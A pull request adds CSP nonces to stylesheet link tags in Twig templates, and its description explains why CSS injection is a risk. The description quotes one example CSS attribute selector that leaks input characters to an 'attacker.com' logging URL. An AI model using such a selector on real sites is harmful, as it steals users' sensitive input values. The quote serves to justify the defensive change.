### PR TITLE
Add CSP nonce to CSS asset links

### DIFF
--- a/templates/includes/_css_assets.html.twig
+++ b/templates/includes/_css_assets.html.twig
@@ -3,11 +3,11 @@
     {% if css_asset.preload %}
         {% guard function preload %}
             {% set href = asset(css_asset.value, css_asset.packageName) %}
-            <link rel="stylesheet" href="{{ preload(href, {as: 'style', nopush: css_asset.nopush}) }}"
+            <link {% guard function csp_nonce %}nonce="{{ csp_nonce('style') }}"{% endguard %} rel="stylesheet" href="{{ preload(href, {as: 'style', nopush: css_asset.nopush}) }}"
             {%- for attr, value in css_asset.htmlAttributes %} {{ attr }}="{{ value|e('html') }}"{% endfor %}>
         {% endguard %}
     {% else %}
-        <link rel="stylesheet" href="{{ asset(css_asset.value, css_asset.packageName) }}"
+        <link {% guard function csp_nonce %}nonce="{{ csp_nonce('style') }}"{% endguard %} rel="stylesheet" href="{{ asset(css_asset.value, css_asset.packageName) }}"
         {%- for attr, value in css_asset.htmlAttributes %} {{ attr }}="{{ value|e('html') }}"{% endfor %}>
     {% endif %}
 {% endfor %}

--- a/templates/layout.html.twig
+++ b/templates/layout.html.twig
@@ -17,7 +17,11 @@
     <title>{{ page_title_block_output|striptags|raw }}</title>
 
     {% block head_stylesheets %}
-        <link rel="stylesheet" href="{{ asset('app.css', ea.assets.defaultAssetPackageName) }}">
+        {% guard function csp_nonce %}
+            <link rel="stylesheet" href="{{ asset('app.css', ea.assets.defaultAssetPackageName) }}" nonce="{{ csp_nonce('style') }}">
+        {% else %}
+            <link rel="stylesheet" href="{{ asset('app.css', ea.assets.defaultAssetPackageName) }}">
+        {% endguard %}
     {% endblock %}
 
     {% block configured_stylesheets %}


### PR DESCRIPTION
Thanks for the integration of the csp protection for script tags. It really helps to get rid of some workarounds in my code. 

But while scripts are the most obvious attack vector, manipulated CSS also poses significant security risks. Malicious styles can be used to exfiltrate data — for example, by using attribute selectors like input[value^="a"] { background: url('//attacker.com/log?char=a'); } to brute-force sensitive input values. Additionally, CSS injection allows for UI redressing (moving around buttons, inputs etc.).

So I applied the same logic to the css loading.